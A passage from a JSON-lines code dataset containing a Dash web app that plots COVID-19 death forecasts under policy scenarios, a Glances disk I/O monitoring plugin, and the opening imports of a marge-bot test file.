\"border-radius\": \"10%\", \"font-size\": 10, \"width\":\"7px\", \"margin-right\":\"10px\"}\n\nname_style = dict({\"color\": \"#4E4646\", 'fontSize': 13, \"width\": \"150px\", \"marginBottom\": \".5em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\"})\nname_style_ = dict({\"color\": \"#4E4646\", 'fontSize': 13, \"width\": \"250px\", \"marginBottom\": \".5em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\"})\ninput_style = dict({\"width\": \"100px\", \"height\": \"30px\", \"columnCount\": 1, \"textAlign\": \"center\", \"marginBottom\": \"1em\", \"font-size\":12, \"border-color\":LIGHT_PINK})\nform_style = dict({'width' : '10%', 'margin' : '0 auto'})\nradio_style = dict({\"width\": \"150px\", \"color\": \"#524E4E\", \"columnCount\": 3, \"display\": \"inline-block\", \"font-size\":11, \"border-color\":LIGHT_PINK})\nradio_style_short = dict({\"width\": \"110px\", \"color\": \"#524E4E\", \"columnCount\": 3, \"display\": \"inline-block\", \"font-size\":11})\nradio_style_long = dict({\"width\": \"450px\", \"color\": GRAY, \"columnCount\": 6, \"display\": \"inline-block\", \"font-size\":11, \"font-family\": \"Noto Sans JP\"})\nname_style_long = dict({\"color\": \"#4E4646\", 'fontSize': 13, \"width\": \"450px\", \"columnCount\": 3, \"marginBottom\": \".5em\", \"textAlign\": \"left\"})\nradio_style_her2 = dict({\"width\": \"150px\", \"color\": \"#524E4E\", \"columnCount\": 3, \"display\": \"inline-block\", \"font-size\":11})\nname_style_her2 = dict({\"color\": \"#4E4646\", 'fontSize': 13, \"width\": \"120px\", \"columnCount\": 1, \"marginBottom\": \".5em\", \"textAlign\": \"left\"})\n\n\ndef _get_input_HTML_format(name, ID, name_style, input_range, input_step, placeholder, input_style):\n\n _html_input = html.P(children=[html.Div(name, style=name_style), \n dcc.Input(placeholder=placeholder, type='number', \n min=input_range[0], max=input_range[1], step=input_step, \n style=input_style, id=ID)])\n\n return _html_input\n\n\ndef _get_radioItems_HTML_format(name, ID, name_style, options, radio_style):\n\n _html_radioItem = html.P(children=[html.Div(name, style=name_style), \n dcc.RadioItems(options=options, value=1, style=radio_style, id=ID)])\n\n return _html_radioItem\n\n\ndef _get_toggle_switch(name, name_style, color_style, ID):\n\n _html_toggle = html.P(children=[html.Div(name, style=name_style),\n daq.ToggleSwitch(color=color_style, size=30, value=True, \n label=['No', 'Yes'], style={\"font-size\":9, \"font-family\": \"Noto Sans JP\", \"color\":GRAY}, id=ID)], \n style={\"width\": \"100px\", \"font-size\":9})\n\n return _html_toggle\n\ndef HORIZONTAL_SPACE(space_size):\n \n return dbc.Row(dbc.Col(html.Div(\" \", style={\"marginBottom\": str(space_size) + \"em\"})))\n\ndef VERTICAL_SPACE(space_size):\n\n return dbc.Col(html.Div(\" \"), style={\"width\": str(space_size) + \"px\"})\n\n#-------------------------------------------------------\n'''\nApp layout components\n\nList of layout components >>\n---------------------------\nHEADER :: Logo display and navigation buttons on the app\n header area \n\nPATIENT_INFO_FORM :: form that reads patient information\n to compute and display risk\n'''\n#-------------------------------------------------------\n\n\n# Create the **header** with logo and navigation buttons\n#-------------------------------------------------------\n\nLEARN_BUTTON = html.A(dbc.Button(\"Learn More\", style={\"bgcolor\": \"gray\"}), href=\"https://www.vanderschaar-lab.com/policy-impact-predictor-for-covid-19/\", className=\"two columns\")\nWEBSITE_BUTTON = 
html.A(dbc.Button(\"Go back to website\", style={\"bgcolor\": \"gray\"}), href=\"https://www.vanderschaar-lab.com/policy-impact-predictor-for-covid-19/\", className=\"two columns\")\nFEEDBACK_BUTTON = html.A(dbc.Button(\"Send Feedback\", style={\"bgcolor\": \"gray\"}), href=\"https://www.vanderschaar-lab.com/contact-us/\", className=\"two columns\")\nGITHUB_BUTTON = html.A(dbc.Button(\"GitHub\", style={\"bgcolor\": \"gray\"}), href=\"https://www.vanderschaar-lab.com/contact-us/\", className=\"two columns\")\nRESET_BUTTON = dbc.Button(\"Reset All\", style={\"bgcolor\": \"gray\"})\n\nHEADER = html.Div([\n\n html.Div(\n [ \n \n dbc.Row([dbc.Col(html.Img(src=app.get_asset_url(\"logo.png\"), id=\"adjutorium-logo\", style={\"height\": \"100px\", 'textAlign': 'left',\n \"width\": \"auto\",})),\n VERTICAL_SPACE(325), \n dbc.Col(LEARN_BUTTON),\n VERTICAL_SPACE(20),\n dbc.Col(WEBSITE_BUTTON),\n VERTICAL_SPACE(20),\n dbc.Col(FEEDBACK_BUTTON), \n VERTICAL_SPACE(20),\n dbc.Col(GITHUB_BUTTON)]), \n \n ], style={\"margin-left\":\"5ex\"}, className=\"header\"),\n\n ],\n\n)\n\n\n# Create the *Patient Information form* for app body\n# -------------------------------------------------- \n\n# Input, name & HTML form styling dictionaries\n\n\nCOUNTRY_DROPMENU = dcc.Dropdown(id='country', options= COUNTRY_LIST, value=\"United Kingdom\", \n placeholder=\" \", style={\"width\":\"150px\", \"height\": \"30px\", \"font-size\": 11, \"border-color\":GRAY, \"color\":GRAY,\n \"font-color\":GRAY, \"margin-top\":\"-.1em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\", \n \"vertical-align\":\"top\", \"display\": \"inline-block\"}) \n\nREGION_DROPMENU = dcc.Dropdown(id='region', options= COUNTRY_LIST, disabled=True, \n placeholder=\" \", style={\"width\":\"150px\", \"height\": \"30px\", \"font-size\": 11, \"border-color\":GRAY, \"color\":GRAY,\n \"font-color\":GRAY, \"margin-top\":\"-.1em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\", \n \"vertical-align\":\"top\", \"display\": \"inline-block\"}) \n\nTARGET_DROPMENU = dcc.Dropdown(id='target', options= TARGET_LIST, value=0, \n placeholder=\" \", style={\"width\":\"150px\", \"height\": \"30px\", \"font-size\": 11, \"border-color\":GRAY, \"color\":GRAY,\n \"font-color\":GRAY, \"margin-top\":\"-.1em\", \"textAlign\": \"left\", \"font-family\": \"Noto Sans JP\", \n \"vertical-align\":\"top\", \"display\": \"inline-block\"}) \n\nHORIZON_SLIDER = dcc.Slider(id='horizonslider', marks={7: \"1w\", 30: \"1m\", 60: \"2m\", 90: \"3m\", 120: \"4m\"}, min=7, \n max=120, value=30, step=1, updatemode=\"drag\")\n\n\nMASK_SLIDER = dcc.RadioItems(id='maskslider',\n options=[{'label': 'No policy measures', 'value': 0}, \n {'label': 'Recommended', 'value': 1},\n {'label': 'Limited mandate', 'value': 2},\n {'label': 'Universal', 'value': 3}], value=1, \n labelStyle={\"display\": \"inline-block\", \"font-size\": 11,\n \"font-family\": \"Noto Sans JP\", \"color\":GRAY, \"width\":\"50%\"},\n inputStyle={\"color\":CYAN}) \n\nSOCIAL_DIST_OPT = dcc.Dropdown(options=[{'label': 'Workplace closure', 'value': 0},\n {'label': 'Public events cancellation', 'value': 1},\n {'label': 'Public transport closure', 'value': 2},\n {'label': 'Gatherings restrictions', 'value': 3},\n {'label': 'Shelter-in-place' , 'value': 4},\n {'label': 'Internal movement restrictions' , 'value': 5},\n {'label': 'Travel restrictions' , 'value': 6}],\n style={\"font-size\": 11, \"font-family\": \"Noto Sans JP\", \"color\":GRAY, \"width\":\"300px\", \"height\": \"25px\", \"border-color\":GRAY},\n 
multi=True) \n\nDISPLAY_LIST_1 = dcc.Checklist(options=[{'label': 'Compare with current policy', 'value': 1}], \n labelStyle={\"font-size\": 11, \"font-family\": \"Noto Sans JP\", \"color\":GRAY, 'display': 'inline-block'}) \n\nDISPLAY_LIST_2 = dcc.Checklist(options=[{'label': 'Show PIP model fit', 'value': 1}],\n labelStyle={\"font-size\": 11, \"font-family\": \"Noto Sans JP\", \"color\":GRAY, 'display': 'inline-block'},\n id=\"pipfit\") \n\n\nDISPLAY_LIST_3 = dcc.Checklist(options=[{'label': 'Confidence Intervals', 'value': 1}], \n value=[1],\n labelStyle={\"font-size\": 11, \"font-family\": \"Noto Sans JP\", \"color\":GRAY, 'display': 'inline-block'},\n id=\"confidenceint\") \n\n\nNum_days = (dt.date.today() - dt.date(2020, 1, 1)).days \nBEGIN_DATE = dcc.Slider(id='dateslider', marks={0: \"Jan 1st, 2020\", Num_days: \"Today\"}, \n min=0, max=Num_days, value=0, step=1, updatemode=\"drag\")\n\nHORIZON_NOTE = \"*w = week, m = month.\" \nREQUEST_NOTE = \"Select a geographical location and the required forecast.\" \nREQUEST_NOTE_2 = \"Select the non-pharmaceutical interventions (NPIs) to be applied in the geographical area selected above.\" \n\nCOUNTRY_SELECT = html.P(children=[html.Div(\"Country\", style=name_style), COUNTRY_DROPMENU])\nREGION_SELECT = html.P(children=[html.Div(\"Region\", style=name_style), REGION_DROPMENU])\nTARGET_SELECT = html.P(children=[html.Div(\"Forecast Target\", style=name_style), TARGET_DROPMENU])\nHORIZON_SELECT = html.P(children=[html.Div(\"Forecast Horizon*\", style=name_style), HORIZON_SLIDER])\nMASK_SELECT = html.P(children=[html.Div(\"Mask Policy\", style=name_style), MASK_SLIDER])\nSOCIAL_SELECT = html.P(children=[html.Div(\"Social Distancing Measures\", style=name_style_), SOCIAL_DIST_OPT])\nBEGIN_SELECT = html.P(children=[html.Div(\"View from\", style=PANEL_TEXT_STYLE4), BEGIN_DATE]) \nSCHOOL_CLOSURE = _get_toggle_switch(name=\"School Closure \", name_style=name_style, color_style=CYAN, ID=\"CT\")\n\n\nPATIENT_INFO_FORM = html.Div(\n [\n\n html.Div(\n [ \n \n dbc.Row(dbc.Col(html.Div(\"Forecast Settings\", style={\"marginBottom\": \"0.5em\", \"margin-top\": \"1em\", \"margin-left\": MARGIN_INPUT, \n \"color\":DARK_GRAY, \"font-weight\": \"bold\", \"font-size\": \"11\", \"font-family\": 'Noto Sans JP'}))),\n dbc.Row(dbc.Col(html.Div(REQUEST_NOTE, style=PANEL_TEXT_STYLE2))),\n HORIZONTAL_SPACE(1),\n dbc.Row(\n [\n dbc.Col(COUNTRY_SELECT), \n VERTICAL_SPACE(40),\n dbc.Col(REGION_SELECT), \n \n ], style={\"margin-left\": \"40px\"}\n ),\n HORIZONTAL_SPACE(1),\n dbc.Row(\n [ dbc.Col(TARGET_SELECT),\n VERTICAL_SPACE(40),\n dbc.Col(HORIZON_SELECT), \n ], style={\"margin-left\": \"40px\"}\n ),\n HORIZONTAL_SPACE(.5),\n dbc.Row([VERTICAL_SPACE(200), dbc.Col(html.Div(HORIZON_NOTE, style=PANEL_TEXT_STYLE))]),\n HORIZONTAL_SPACE(1),\n\n ], style={\"box-shadow\": BOX_SHADOW, \"margin\": MARGIN_INPUT, \"background-color\": PANEL_COLOR, \"width\": \"450px\"}), \n\n html.Div(\n [ \n dbc.Row(dbc.Col(html.Div(\"Policy Scenario\", style={\"marginBottom\": \"1em\", \"margin-top\": \"1em\", \"margin-left\": MARGIN_INPUT,\n \"color\":DARK_GRAY, \"font-weight\": \"bold\", \"font-size\": \"11\", \"font-family\":'Noto Sans JP'}))), \n dbc.Row(dbc.Col(html.Div(REQUEST_NOTE_2, style=PANEL_TEXT_STYLE2))),\n HORIZONTAL_SPACE(1),\n dbc.Row(\n [ \n VERTICAL_SPACE(40),\n dbc.Col(SCHOOL_CLOSURE), \n VERTICAL_SPACE(60),\n dbc.Col(MASK_SELECT),\n ], style={\"margin-left\": MARGIN_INPUT}\n ),\n HORIZONTAL_SPACE(.5),\n dbc.Row(\n [ \n VERTICAL_SPACE(25),\n dbc.Col(SOCIAL_SELECT), \n ], 
style={\"margin-left\": MARGIN_INPUT}\n ),\n HORIZONTAL_SPACE(2),\n ], style={\"box-shadow\": BOX_SHADOW, \"margin\": MARGIN_INPUT, \"background-color\": PANEL_COLOR, \"width\": \"450px\"}),\n\n ],\n\n)\n\n# Create the results display panel\n\nCAUTION_STATEMENT = \"Disclaimer: PIP uses machine learning to predict the most likely trajectory of COVID-19 deaths based on current knowledge and data, but will not provide 100% accurate predictions. Click on the 'Learn more' button to read our model's assumptions and limitations.\"\n\n\nRESULTS_DISPLAY = html.Div(\n [\n\n html.Div( \n [ \n\n dbc.Row(dbc.Col(html.Div(\"COVID-19 Forecasts\", style=TITLE_STYLE))),\n dbc.Row(dbc.Col(html.Div(CAUTION_STATEMENT, style=PANEL_TEXT_STYLE2))),\n HORIZONTAL_SPACE(.5),\n dbc.Row([dbc.Col(html.Div(\"Display Options\", style=PANEL_TEXT_STYLE3)), VERTICAL_SPACE(10), DISPLAY_LIST_2, VERTICAL_SPACE(10), DISPLAY_LIST_1,\n VERTICAL_SPACE(10), DISPLAY_LIST_3, VERTICAL_SPACE(70), BEGIN_SELECT]), \n HORIZONTAL_SPACE(2),\n dbc.Row(html.Div(dcc.Graph(id=\"covid_19_forecasts\", config={'displayModeBar': False}), style={\"marginBottom\": \".5em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT})), \n HORIZONTAL_SPACE(1.25),\n ], style={\"box-shadow\": BOX_SHADOW, \"margin\": MARGIN_INPUT, \"background-color\": PANEL_COLOR, \"width\": \"800px\"}),\n\n ]\n\n)\n\n#-----------------------------------------------------\n'''\nAPP Layout: contains the app header, the information\nform and the displayed graphs\n'''\n#-----------------------------------------------------\n\n #
\n # Micromodal\n #\n\npopup = html.Div([\n dash_dangerously_set_inner_html.DangerouslySetInnerHTML('''\n [The modal's HTML markup was lost during text extraction; the recoverable content is a logo image (alt text \"image\") and the disclaimer paragraph below.]\n PIP is an online tool that uses machine learning to predict the impact of non-pharmaceutical policy measures on the future trajectory of COVID-19 deaths. The model is designed and trained based on current knowledge and data, and does not provide 100% accurate predictions. Please make sure to discuss the projections of PIP with your local health officials and experts. Visit our website to learn more about our model's assumptions and limitations.\n
\n '''),\n]) \n\napp.layout = html.Div([popup, HEADER, html.Div([PATIENT_INFO_FORM, RESULTS_DISPLAY], className=\"row app-center\")])\n \n@app.callback(\n Output(\"covid_19_forecasts\", \"figure\"),\n [Input(\"target\", \"value\"), Input(\"horizonslider\", \"value\"), Input(\"dateslider\", \"value\"), Input(\"maskslider\", \"value\"), Input(\"country\", \"value\"),\n Input(\"pipfit\", \"value\"), Input(\"confidenceint\", \"value\")]) \n\ndef update_risk_score(target, horizonslider, dateslider, maskslider, country, pipfit, confidenceint):\n\n \"\"\"\n Set X and Y axes based on input callbacks\n\n \"\"\"\n\n SHOW_PIP_FIT = False\n SHOW_CONFIDENCE = True\n\n if type(pipfit)==list:\n\n if len(pipfit) > 0:\n\n SHOW_PIP_FIT = True\n\n if type(confidenceint) !=list or len(confidenceint)==0: \n \n SHOW_CONFIDENCE = False \n\n Y_AXIS_NAME = TARGETS[target] \n TODAY_DATE = dt.datetime.today()\n BEGIN_YEAR = dt.datetime(2020, 1, 1)\n DAYS_TILL_TODAY = (TODAY_DATE - BEGIN_YEAR).days\n END_DATE = TODAY_DATE + dt.timedelta(days=horizonslider)\n START_DATE = BEGIN_YEAR + dt.timedelta(days=dateslider)\n DATE_RANGE = pd.date_range(start=START_DATE, end=END_DATE) \n TOTAL_NUM_DAYS = len(DATE_RANGE)\n TRUE_DEATHS_DATES = pd.date_range(start=START_DATE, end=TODAY_DATE)\n FORECAST_DATES = pd.date_range(start=TODAY_DATE + dt.timedelta(days=1), end=END_DATE)\n MAX_HORIZON = 120 \n PLOT_RATIO = 0.2\n\n predictive_model = global_models[country]\n country_DELVE_dat = country_data[country]\n deaths_true = country_DELVE_dat[\"Daily deaths\"]\n NPI_data = country_data[country][\"NPI data\"]\n\n deaths_true[deaths_true < 0] = 0\n deaths_smooth = smooth_curve_1d(deaths_true)\n cumulative_deaths = np.cumsum(deaths_true)\n\n if maskslider==0:\n\n deaths_pred, _, R_t = predictive_model.predict(DAYS_TILL_TODAY + MAX_HORIZON, R0_forecast=1*np.ones(MAX_HORIZON))\n deaths_forecast = deaths_pred[DAYS_TILL_TODAY-1:DAYS_TILL_TODAY + horizonslider-1]\n PIP_MODEL_FIT = deaths_pred[:DAYS_TILL_TODAY-1] \n\n else:\n \n deaths_forecast = global_projections[country][0][DAYS_TILL_TODAY-1:DAYS_TILL_TODAY + horizonslider-1]\n PIP_MODEL_FIT = global_projections[country][0][:DAYS_TILL_TODAY-1] \n \n cum_death_forecast = np.cumsum(deaths_forecast) + np.sum(deaths_true)\n R0_t_forecast = global_projections[country][3][dateslider:DAYS_TILL_TODAY + horizonslider-1]\n deaths_CI_l = global_projections[country][2][:horizonslider]\n deaths_CI_u = global_projections[country][1][:horizonslider] \n\n\n if target==0:\n\n Y_MAX_VAL = np.maximum(np.max(deaths_smooth), np.max(deaths_forecast))\n Y_MAX_VAL = Y_MAX_VAL * (1 + PLOT_RATIO)\n\n elif target==1:\n \n Y_MAX_VAL = np.max(cum_death_forecast) + np.max(deaths_CI_u) \n Y_MAX_VAL = Y_MAX_VAL * (1 + PLOT_RATIO)\n\n elif target==2:\n \n Y_MAX_VAL = 6 \n\n LINE_WIDTH = 2\n LINE_WIDTH_ = 3\n _OPACITY_1 = 0.2\n _OPACITY_2 = 0.3\n _OPACITY_3 = 0.4\n COLOR_1 = (\"#4F27EC\", \"rgba(79, 39, 236, \" + str(_OPACITY_1)+\")\")\n COLOR_2 = (\"#AF1CF7\", \"rgba(175, 28, 247, \" + str(_OPACITY_2)+\")\")\n COLOR_3 = (\"#F5B7B1\", \"rgba(245, 183, 177, \" + str(_OPACITY_3)+\")\") \n\n LINE_STYLE_0 = {\"color\":\"#2C2B2D\", \"width\":LINE_WIDTH, \"dash\": \"dot\"}\n LINE_STYLE_1 = {\"color\":COLOR_1[0], \"width\":LINE_WIDTH}\n LINE_STYLE_2 = {\"color\":COLOR_2[0], \"width\":LINE_WIDTH}\n LINE_STYLE_3 = {\"color\":COLOR_3[0], \"width\":LINE_WIDTH}\n LINE_STYLE_4 = {\"color\":GRAY, \"width\":LINE_WIDTH, \"dash\": \"dot\"}\n\n TRUE_DEATH_STYLE = {\"color\":\"red\", \"opacity\":.25}\n PIP_FIT_STYLE = {\"color\":PURPLE_COLOR, 
\"symbol\":\"cross\", \"opacity\":.5}\n SMTH_DEATH_STYLE = {\"color\":\"red\", \"width\":LINE_WIDTH, \"dash\": \"dot\"}\n R0_STYLE = {\"color\":PURPLE_COLOR, \"width\":LINE_WIDTH_}\n R0_STYLE_ = {\"color\":PURPLE_COLOR, \"width\":LINE_WIDTH_, \"dash\": \"dot\"}\n FORECAST_STYLE = {\"color\":\"black\", \"width\":LINE_WIDTH_, \"dash\": \"dot\"}\n FORECAST_STYLE_ = {\"color\":COLOR_3[1], \"width\":LINE_WIDTH}\n\n pip_fit_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": PIP_MODEL_FIT[dateslider:], \"mode\":\"markers\", \"marker\":PIP_FIT_STYLE, \n \"name\": \"PIP Model Fit\"}\n\n deaths_true_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": deaths_true[dateslider:], \"mode\":\"markers\", \"marker\":TRUE_DEATH_STYLE, \n \"name\": \"Daily Deaths\"}\n\n death_smooth_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": deaths_smooth[dateslider:], \"mode\":\"lines\", \"line\":SMTH_DEATH_STYLE, \n \"name\": \"7-day Average Deaths\"} \n\n death_frcst_dict = {\"x\":FORECAST_DATES, \"y\": deaths_forecast, \"mode\":\"lines\", \"line\":FORECAST_STYLE, \n \"name\": \"Deaths Forecast\"} \n\n death_frcst_dictu = {\"x\":FORECAST_DATES, \"y\": deaths_CI_u, \"mode\":\"lines\", \"line\":FORECAST_STYLE_, \n \"fill\":\"tonexty\", \"fillcolor\":COLOR_3[1], \"name\": \"Deaths Forecast (Upper)\"} \n\n death_frcst_dictl = {\"x\":FORECAST_DATES, \"y\": deaths_CI_l, \"mode\":\"lines\", \"line\":FORECAST_STYLE_, \n \"name\": \"Deaths Forecast (Lower)\"} \n\n cum_frcst_dictu = {\"x\":FORECAST_DATES, \"y\": np.sum(deaths_true) + np.cumsum(deaths_CI_u), \"mode\":\"lines\", \"line\":FORECAST_STYLE_, \n \"fill\":\"tonexty\", \"fillcolor\":COLOR_3[1], \"name\": \"Cumulative Deaths (Upper)\"} \n\n cum_frcst_dictl = {\"x\":FORECAST_DATES, \"y\": np.sum(deaths_true) + np.cumsum(deaths_CI_l), \"mode\":\"lines\", \"line\":FORECAST_STYLE_, \n \"name\": \"Cumulative Deaths (Lower)\"} \n\n cum_frcst_dict = {\"x\":FORECAST_DATES, \"y\": cum_death_forecast, \"mode\":\"lines\", \"line\":FORECAST_STYLE, \n \"name\": \"Cumulative Deaths Forecast\"} \n\n cum_death_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": cumulative_deaths[dateslider:], \"mode\":\"lines\", \"line\":SMTH_DEATH_STYLE, \n \"name\": \"Cumulative Deaths\"} \n\n R0_frcst_dict = {\"x\":TRUE_DEATHS_DATES, \"y\": R0_t_forecast[dateslider:DAYS_TILL_TODAY], \"mode\":\"lines\", \"line\":R0_STYLE, \n \"name\": \"R0_t\"} \n\n R0_pred_dict = {\"x\":FORECAST_DATES, \"y\": R0_t_forecast[DAYS_TILL_TODAY-1:DAYS_TILL_TODAY + horizonslider-1], \"mode\":\"lines\", \"line\":R0_STYLE_, \n \"name\": \"R0_t\"} \n\n today_line = {\"x\":[dt.date.today() for k in range(int(Y_MAX_VAL))], \"y\": np.linspace(0, int(Y_MAX_VAL), int(Y_MAX_VAL)), \"mode\":\"lines\", \"line\":LINE_STYLE_4, \n \"name\": \"Forecast day\"} \n\n if target==0:\n\n DATA_DICT = [deaths_true_dict, death_smooth_dict, death_frcst_dict]\n\n if SHOW_CONFIDENCE:\n\n DATA_DICT = DATA_DICT + [death_frcst_dictu, death_frcst_dictl]\n\n if SHOW_PIP_FIT:\n\n DATA_DICT = DATA_DICT + [pip_fit_dict]\n\n DATA_DICT = DATA_DICT + [today_line] \n\n elif target==1:\n \n DATA_DICT = [cum_death_dict, cum_frcst_dict]\n\n if SHOW_CONFIDENCE:\n\n DATA_DICT = DATA_DICT + [cum_frcst_dictu, cum_frcst_dictl]\n\n DATA_DICT = DATA_DICT + [today_line] \n\n elif target==2:\n\n DATA_DICT = [R0_frcst_dict, R0_pred_dict, today_line]\n\n plot_dict = {\n \"data\": DATA_DICT,\n \"showlegend\": False, \n \"layout\": {\n \"legend\":{\"x\":-10, \"y\":0, \"bgcolor\": \"rgba(0,0,0,0)\", \"font-size\":8},\n \"showlegend\": False, \n \"font-size\":11,\n \"width\":775,\n \"height\":383,\n 
\"plot_bgcolor\":PANEL_COLOR,\n \"paper_bgcolor\":PANEL_COLOR,\n \"margin\":dict(l=60, r=50, t=30, b=40),\n \"fill\":\"toself\", \"fillcolor\":\"violet\",\n \"title\":\" Current deaths: \" + \" \"+ str(format(int(np.sum(deaths_true)), \",\")) + \" | Projected total deaths: \" + \" \"+ str(format(int(np.ceil(cum_death_forecast[-1])), \",\")) + \" by \" + END_DATE.strftime(\"%b %d, %Y\"), \n \"titlefont\":dict(size=13, color=GRAY, family=\"Noto Sans JP\"),\n \"xaxis\":go.layout.XAxis(title_text=\" Date \", type=\"date\", tickvals=DATE_RANGE, dtick=10, tickmode=\"auto\", \n zeroline=False, titlefont=dict(size=12, color=GRAY, family=\"Noto Sans JP\")),\n \"yaxis\":go.layout.YAxis(title_text=\" \" + Y_AXIS_NAME + \" \", tickmode=\"auto\", range=[0, Y_MAX_VAL], \n titlefont=dict(size=12, color=GRAY, family=\"Noto Sans JP\"))} \n }\n\n return plot_dict\n\n#-----------------------------------------------------\n'''\nMain\n'''\n#-----------------------------------------------------\nif __name__ == '__main__':\n \n app.server.run(debug=True, threaded=True)\n\n\n# confidence disable and PIP fit\n\n# fix confidence intervals plot\n# Each country has default policy\n# Print numbers on top\n# Model update time\n# confidence in R0 and policy timeline\n\n# imput date\n# current and extra deaths\n# textual explanation and caveats\n","sub_path":"app/PIP-COVID19/app_backup/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":31076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"53076233","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Glances.\n#\n# Copyright (C) 2015 Nicolargo \n#\n# Glances is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Glances is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program. 
If not, see .\n\n\"\"\"Disk I/O plugin.\"\"\"\n\nimport operator\n\nimport psutil\n\n# Import Glances libs\nfrom glances.core.glances_timer import getTimeSinceLastUpdate\nfrom glances.plugins.glances_plugin import GlancesPlugin\n\n# Define the history items list\n# All items in this list will be historised if the --enable-history tag is set\n# 'color' define the graph color in #RGB format\nitems_history_list = [{'name': 'read_bytes', 'color': '#00FF00', 'y_unit': 'B/s'},\n {'name': 'write_bytes', 'color': '#FF0000', 'y_unit': 'B/s'}]\n\n\nclass Plugin(GlancesPlugin):\n\n \"\"\"Glances' disks I/O plugin.\n\n stats is a list\n \"\"\"\n\n def __init__(self, args=None):\n \"\"\"Init the plugin.\"\"\"\n GlancesPlugin.__init__(\n self, args=args, items_history_list=items_history_list)\n\n # We want to display the stat in the curse interface\n self.display_curse = True\n\n # Init the stats\n self.reset()\n\n def get_key(self):\n \"\"\"Return the key of the list\"\"\"\n return 'disk_name'\n\n def reset(self):\n \"\"\"Reset/init the stats.\"\"\"\n self.stats = []\n\n @GlancesPlugin._log_result_decorator\n def update(self):\n \"\"\"Update disk I/O stats using the input method.\"\"\"\n # Reset stats\n self.reset()\n\n if self.get_input() == 'local':\n # Update stats using the standard system lib\n # Grab the stat using the PsUtil disk_io_counters method\n # read_count: number of reads\n # write_count: number of writes\n # read_bytes: number of bytes read\n # write_bytes: number of bytes written\n # read_time: time spent reading from disk (in milliseconds)\n # write_time: time spent writing to disk (in milliseconds)\n try:\n diskiocounters = psutil.disk_io_counters(perdisk=True)\n except Exception:\n return self.stats\n\n # Previous disk IO stats are stored in the diskio_old variable\n if not hasattr(self, 'diskio_old'):\n # First call, we init the network_old var\n try:\n self.diskio_old = diskiocounters\n except (IOError, UnboundLocalError):\n pass\n else:\n # By storing time data we enable Rx/s and Tx/s calculations in the\n # XML/RPC API, which would otherwise be overly difficult work\n # for users of the API\n time_since_update = getTimeSinceLastUpdate('disk')\n\n diskio_new = diskiocounters\n for disk in diskio_new:\n try:\n # Try necessary to manage dynamic disk creation/del\n diskstat = {}\n diskstat['time_since_update'] = time_since_update\n diskstat['disk_name'] = disk\n diskstat['read_bytes'] = (\n diskio_new[disk].read_bytes -\n self.diskio_old[disk].read_bytes)\n diskstat['write_bytes'] = (\n diskio_new[disk].write_bytes -\n self.diskio_old[disk].write_bytes)\n except KeyError:\n continue\n else:\n diskstat['key'] = self.get_key()\n self.stats.append(diskstat)\n\n # Save stats to compute next bitrate\n self.diskio_old = diskio_new\n elif self.get_input() == 'snmp':\n # Update stats using SNMP\n # No standard way for the moment...\n pass\n\n # Update the history list\n self.update_stats_history('disk_name')\n\n # Update the view\n self.update_views()\n\n return self.stats\n\n def update_views(self):\n \"\"\"Update stats views\"\"\"\n # Call the father's method\n GlancesPlugin.update_views(self)\n\n # Add specifics informations\n # Alert\n for i in self.stats:\n disk_real_name = i['disk_name']\n self.views[i[self.get_key()]]['read_bytes']['decoration'] = self.get_alert(int(i['read_bytes'] // i['time_since_update']),\n header=disk_real_name + '_rx')\n self.views[i[self.get_key()]]['write_bytes']['decoration'] = self.get_alert(int(i['write_bytes'] // i['time_since_update']),\n 
header=disk_real_name + '_tx')\n\n def msg_curse(self, args=None):\n \"\"\"Return the dict to display in the curse interface.\"\"\"\n # Init the return message\n ret = []\n\n # Only process if stats exist and display plugin enable...\n if not self.stats or args.disable_diskio:\n return ret\n\n # Build the string message\n # Header\n msg = '{0:9}'.format(_(\"DISK I/O\"))\n ret.append(self.curse_add_line(msg, \"TITLE\"))\n msg = '{0:>7}'.format(_(\"R/s\"))\n ret.append(self.curse_add_line(msg))\n msg = '{0:>7}'.format(_(\"W/s\"))\n ret.append(self.curse_add_line(msg))\n # Disk list (sorted by name)\n for i in sorted(self.stats, key=operator.itemgetter(self.get_key())):\n # Do not display hidden interfaces\n if self.is_hide(i['disk_name']):\n continue\n # Is there an alias for the disk name ?\n disk_real_name = i['disk_name']\n disk_name = self.has_alias(i['disk_name'])\n if disk_name is None:\n disk_name = disk_real_name\n # New line\n ret.append(self.curse_new_line())\n if len(disk_name) > 9:\n # Cut disk name if it is too long\n disk_name = '_' + disk_name[-8:]\n msg = '{0:9}'.format(disk_name)\n ret.append(self.curse_add_line(msg))\n txps = self.auto_unit(\n int(i['read_bytes'] // i['time_since_update']))\n rxps = self.auto_unit(\n int(i['write_bytes'] // i['time_since_update']))\n msg = '{0:>7}'.format(txps)\n ret.append(self.curse_add_line(msg,\n self.get_views(item=i[self.get_key()],\n key='read_bytes',\n option='decoration')))\n msg = '{0:>7}'.format(rxps)\n ret.append(self.curse_add_line(msg,\n self.get_views(item=i[self.get_key()],\n key='write_bytes',\n option='decoration')))\n\n return ret\n","sub_path":"usr/lib/python3/dist-packages/glances/plugins/glances_diskio.py","file_name":"glances_diskio.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5029658","text":"import contextlib\nfrom collections import namedtuple\nfrom datetime import timedelta\nfrom functools import partial\nfrom unittest.mock import ANY, patch, create_autospec\n\nimport pytest\n\nimport marge.commit\nimport marge.interval\nimport marge.git\nimport marge.gitlab\nimport marge.job\nimport marge.project\nimport 